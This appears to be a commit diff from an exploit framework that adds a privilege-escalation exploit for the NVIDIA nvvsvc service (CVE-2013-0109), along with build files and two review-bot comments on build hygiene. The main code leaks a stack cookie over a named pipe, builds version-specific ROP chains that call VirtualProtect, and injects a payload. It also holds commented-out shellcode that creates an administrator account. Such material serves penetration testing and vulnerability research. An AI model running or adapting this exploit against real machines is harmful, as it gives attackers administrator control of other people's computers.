{ ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020 },
{ ProtocolAction_Receive, { 0 }, 0x4200 },
{ ProtocolAction_ReadCookie, { 0 }, 0 },
{ ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020 },
{ ProtocolAction_Receive, { 0 }, 0x4000 },
{ ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020 },
{ ProtocolAction_Receive, { 0 }, 0x4200 },
{ ProtocolAction_Disconnect, NULL, 0 },
};
DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0;
BOOL bTryAgain = FALSE;
char szPipe[256] = "\\\\.\\pipe\\nvsr";
// We could renable remote hosts to target other devices on network?!
// sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]);
while (i < dwNumberOfMessages)
{
printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages);
switch (rgConvoMsg[i].Action)
{
case ProtocolAction_Connect:
printf(" - CONNECT\n");
hPipe = EstablishPipeConnection(szPipe);
if (!hPipe)
{
printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError());
goto Cleanup;
}
break;
case ProtocolAction_Disconnect:
printf(" - DISCONNECT\n");
CloseHandle(hPipe);
hPipe = NULL;
break;
case ProtocolAction_Send:
printf(" - CLIENT => SERVER\n");
if (!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length)))
{
printf("!! Error writing to pipe\n");
goto Cleanup;
}
printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut);
break;
case ProtocolAction_Receive:
printf("\t - SERVER => CLIENT\n");
if (!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE)))
{
printf("!! Error reading from pipe (at least, no data on pipe)\n");
goto Cleanup;
}
printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut);
break;
case ProtocolAction_ReadCookie:
// x64 Metasploit cmd/exec:
// "net user r00t r00t00r! /add & net localgroup administrators /add"
// exitfunc=thread
/*char code[] = ""
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30"
"\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64"
"\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72"
"\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
"\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/
printf("Building exploit ...\n");
unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034);
printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie);
memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8);
unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL;
// Perform some limited fingerprinting (my default install version, vs latest at time of testing)
switch (uiRetnAddress & 0xfff)
{
case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d
uiBase = uiRetnAddress - 0x4640;
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
// Param 1: lpAddress [r11 (near rsp) into rcx]
pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn
pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
pRopChain[2] = 0; // Padding
pRopChain[3] = 0; // ...
pRopChain[4] = 0; // ...
pRopChain[5] = 0; // ...
pRopChain[6] = 0; // ...
pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
pRopChain[10] = 0; // Padding
pRopChain[11] = 0; // ...
pRopChain[12] = 0; // ...
pRopChain[13] = 0; // ...
pRopChain[14] = 0; // ...
pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn
pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
// Param 4: lpflOldProtect [r9 - already points at writable location]
pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect
pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn
pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax
pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect)
memcpy(pRopChain + 22, payload, payloadLen);
break;
case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f
uiBase = uiRetnAddress - 0x39f1;
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
// Param 1: lpAddress [r11 (near rsp) into rcx]
pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn
pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
pRopChain[2] = 0; // Padding ...
pRopChain[3] = 0; // ...
pRopChain[4] = 0; // ...
pRopChain[5] = 0; // ...
pRopChain[6] = 0; // ...
pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
pRopChain[10] = 0; // Padding ...
pRopChain[11] = 0; // ...
pRopChain[12] = 0; // ...
pRopChain[13] = 0; // ...
pRopChain[14] = 0; // ...
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE
pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
pRopChain[18] = 0; // Padding ...
pRopChain[19] = 0; // ...
pRopChain[20] = 0; // ...
pRopChain[21] = 0; // ...
pRopChain[22] = 0; // ...
// Param 4: lpflOldProtect [r9 - already points at writable location]
pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130
pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn
pRopChain[26] = 0; // Padding ...
pRopChain[27] = 0; // ...
pRopChain[28] = 0; // ...
pRopChain[29] = 0; // ...
pRopChain[30] = 0; // ...
pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax
pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp
memcpy(pRopChain + 33, payload, payloadLen);
break;
case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b
uiBase = uiRetnAddress - 0x3a11;
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
// Param 1: lpAddress [r11 (near rsp) into rcx]
pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn
pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
pRopChain[2] = 0; // Padding ...
pRopChain[3] = 0; // ...
pRopChain[4] = 0; // ...
pRopChain[5] = 0; // ...
pRopChain[6] = 0; // ...
pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
pRopChain[9] = 0; // Padding ...
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE
pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
pRopChain[13] = 0; // Padding ...
pRopChain[14] = 0; // ...
pRopChain[15] = 0; // ...
pRopChain[16] = 0; // ...
pRopChain[17] = 0; // ...
// Param 4: lpflOldProtect [r9 - already points at writable location]
pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128
pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn
pRopChain[21] = 0; // Padding ...
pRopChain[22] = 0; // ...
pRopChain[23] = 0; // ...
pRopChain[24] = 0; // ...
pRopChain[25] = 0; // ...
pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax
pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn
memcpy(pRopChain + 28, payload, payloadLen);
break;
}
break;
}
i++;
}
Cleanup:
if (hPipe)
{
CloseHandle(hPipe);
}
}


@ -0,0 +1,6 @@
#ifndef _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
#define _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
VOID elevate_nvidia_nvsvc(LPVOID payload);
#endif
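Review bot: The prototype `VOID elevate_nvidia_nvsvc(LPVOID payload);` uses Windows typedefs but the header includes nothing, so it only compiles in translation units that have already pulled in the Windows headers; adding `#include <windows.h>` above the prototype makes the header self-contained. The declaration also hands over the payload with no length argument, while the implementation's `memcpy(pRopChain + 22, payload, payloadLen)` copies payloadLen bytes into the message buffer; how payloadLen is derived is not visible in this commit, so a one-line comment on the prototype stating where the length comes from (e.g. `// payload: buffer whose length the callee derives itself — see elevate_nvidia_nvsvc`) would help the next reader.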


@ -0,0 +1,142 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{6B3FF768-1F25-49C1-8827-EDEC84D4749F}</ProjectGuid>
<RootNamespace>nvidia_nvsvc</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\nvidia_nvsvc.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\nvidia_nvsvc.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-0109\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2013-0109\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-0109\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="dllmain.c" />
<ClCompile Include="nvidia_nvsvc.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="nvidia_nvsvc.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
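Review bot: The PreprocessorDefinitions values in both the Debug and Release ClCompile groups read `WIN32;_DEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)` — the inherited `%(PreprocessorDefinitions)` reference appears truncated, which would leave a stray `)` in the define list and drop whatever definitions the property sheets contribute. If this is not merely a rendering artifact of the commit page, both lines should end in `...;_USRDLL;<PROJECT_DEFINE>;%(PreprocessorDefinitions)` with the project's own define restored. Separately, the Release Link group sets BufferSecurityCheck, RandomizedBaseAddress to false and leaves DataExecutionPrevention empty; this is presumably deliberate for a reflectively loaded DLL, but a short XML comment in that group saying so would stop a later maintainer from "fixing" it.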


@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="nvidia_nvsvc.cpp" />
<ClCompile Include="dllmain.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="nvidia_nvsvc.h" />
</ItemGroup>
</Project>


@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store


@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
msbuild.exe make.msbuild /target:%PLAT%
POPD
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-0109 (nvidia_nvsvc)"
PUSHD CVE-2013-0109
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
PUSHD CVE-2013-3660

external/source/vncdll/.gitignore vendored Normal file

@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store


@ -1,131 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "LoadLibraryR.h"
//===============================================================================================//
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
WORD wIndex = 0;
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva < pSectionHeader[0].PointerToRawData )
return dwRva;
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
{
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
}
return 0;
}
//===============================================================================================//
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
UINT_PTR uiBaseAddress = 0;
UINT_PTR uiExportDir = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameOrdinals = 0;
DWORD dwCounter = 0;
#ifdef _WIN64
DWORD dwMeterpreterArch = 2;
#else
DWORD dwMeterpreterArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currenlty we can only process a PE file which is the same type as the one this fuction has
// been compiled as, due to various offset in the PE structures being defined at compile time.
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
{
if( dwMeterpreterArch != 1 )
return 0;
}
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
{
